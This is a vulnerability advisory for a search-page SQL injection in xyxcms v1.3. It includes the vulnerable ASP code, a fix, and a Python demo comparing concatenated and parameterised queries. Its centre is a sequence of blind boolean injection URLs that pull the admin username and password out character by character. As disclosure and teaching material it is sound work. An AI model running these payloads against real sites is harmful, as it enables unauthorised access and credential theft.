xyxcms v1.3 search injection vulnerability
Release date: 2010-06-19    Author: mars
Affected version: xyxcms v1.3
Vendor site: www.xyxcms.com
Description: the search page does not filter its input properly, resulting in a string-type (search) SQL injection.
Code analysis: s.asp. The string search injection is evident from this code segment, where k is read straight from the query string and never filtered:
    ' the search keyword is taken from the query string as-is
    k=request.QueryString("k")
    page=request.QueryString("page")
    if page="" or isnumeric(page)=0 then
        g_cur_page=1
    else
        g_cur_page=cint(page)
    end if
Vulnerability test / exploitation method:
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'='    confirms the table is named admin
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'='    confirms there is exactly 1 administrator
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'='    the administrator username is 4 characters long
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'='    the administrator password is 8 characters long
username length is 4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'='    first character of the username is m
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'='    second character of the username is a
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'='    third character of the username is r
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'='    fourth character of the username is s
So the username is mars
password length is 8
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'='    first character of the password is 1
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'='    second character of the password is 2
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'='    third character of the password is 3
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'='    fourth character of the password is 4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'='    fifth character of the password is q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'='    sixth character of the password is w
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'='    seventh character of the password is q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'='    eighth character of the password is w
So the password is 1234qwqw
Fix: rejecting any k that contains a ' character is enough to stop this injection:
    k=request.QueryString("k")
    ' reject a keyword containing a single quote before it can reach the SQL
    if instr(k,"'")>0 then
        response.Write "<script>alert('error');window.close();</script>"
        response.End()
    end if
    page=request.QueryString("page")
    if page="" or isnumeric(page)=0 then
        g_cur_page=1
    else
        g_cur_page=cint(page)
    end if
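As an added example, not code from the advisory or from xyxcms, the same search modelled in Python on sqlite3 with a constructed schema (the table and column names are assumptions): the concatenating version reproduces the boolean oracle that the k=1%25' ... '%25'=' payloads above rely on, while the parameterised version binds k as data, which is the robust fix to pair with the quote filter above.

```python
import sqlite3

# Constructed sample data standing in for the CMS schema, which the page does not show.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('demo_admin', 'demo_pass');
        CREATE TABLE articles(title TEXT);
        INSERT INTO articles VALUES ('Release notes 1.3'), ('Welcome'), ('Changelog 1.2');
    """)
    return conn

def build_vulnerable_sql(k):
    # Mirrors s.asp: the raw request value is spliced into a LIKE pattern.
    return "SELECT title FROM articles WHERE title LIKE '%" + k + "%'"

def search_vulnerable(conn, k):
    return [row[0] for row in conn.execute(build_vulnerable_sql(k))]

def escape_like(k, esc="\\"):
    # Neutralise LIKE metacharacters so user text cannot widen the pattern.
    return k.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")

def search_safe(conn, k):
    # Parameterised query: k is bound as data and never parsed as SQL.
    pattern = "%" + escape_like(k) + "%"
    return [row[0] for row in conn.execute(
        "SELECT title FROM articles WHERE title LIKE ? ESCAPE '\\'", (pattern,))]

# The advisory's injected value after URL decoding (k=1%25' ...), with the
# page's boolean probe against the admin table; a false probe for contrast.
PROBE_TRUE = "1%' AND (SELECT COUNT(*) FROM admin)>=0 AND '%'='"
PROBE_FALSE = "1%' AND (SELECT COUNT(*) FROM admin)>=5 AND '%'='"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, probe true :", search_vulnerable(db, PROBE_TRUE))
    print("vulnerable, probe false:", search_vulnerable(db, PROBE_FALSE))
    print("parameterised, probe   :", search_safe(db, PROBE_TRUE))
```

In the concatenating version the result set flips between "titles containing 1" and "nothing" depending on the truth of the injected subquery, which is exactly the signal the per-character guesses above read; the parameterised version returns nothing for the probe because no title contains that literal text.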